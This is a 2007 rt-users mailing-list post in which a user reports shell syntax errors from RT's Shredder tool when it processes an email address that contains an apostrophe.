[rt-users] Spam email question

Mathew Snyder theillien at yahoo.com
Thu Feb 8 21:52:43 EST 2007

I created a user called, for no reason in particular, splat's at thisplace.com.
The error received is:

sh: -c: line 0: unexpected EOF while looking for matching `''
sh: -c: line 1: syntax error: unexpected end of file

Th first line is the one I get most often.  The second is because it happened to
be the last email address to be shredded.  Usually Shredder will spit out the
first line and then move on to the next address at which point, everything will
chug along nicely.

Mathew